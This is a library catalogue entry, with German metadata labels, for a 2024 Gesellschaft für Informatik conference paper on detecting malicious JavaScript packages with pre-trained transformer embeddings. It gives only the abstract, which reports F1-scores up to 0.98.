Konferenzbeitrag
Using Pre-trained Transformers to Detect Malicious Source Code Within JavaScript Packages
Lade...
Volltext URI
Dokumententyp
Text/Conference Paper
Zusatzinformation
Datum
2024
Autor:innen
Zeitschriftentitel
ISSN der Zeitschrift
Bandtitel
Quelle
Verlag
Gesellschaft für Informatik e.V.
Zusammenfassung
The proliferation of open source software reuse has led to a significant increase in software supply chain attacks, making it increasingly challenging to identify malicious packages amidst the sheer volume of available packages. Traditional static analysis methods often fall short in detecting these threats due to the complexity and diversity of code semantics. This paper addresses these challenges by leveraging the remarkable success of transformer models in understanding code semantics. We propose a novel approach that utilizes pre-trained transformer models to embed source code, followed by training classifiers on these embeddings. This methodology enables a more nuanced understanding of code semantics, significantly improving the detection of malicious packages. Through extensive experiments, our approach achieves F1-scores as high as 0.98 and an alert rate of 0.09%, demonstrating its effectiveness in detecting malicious code within open source software supply chains.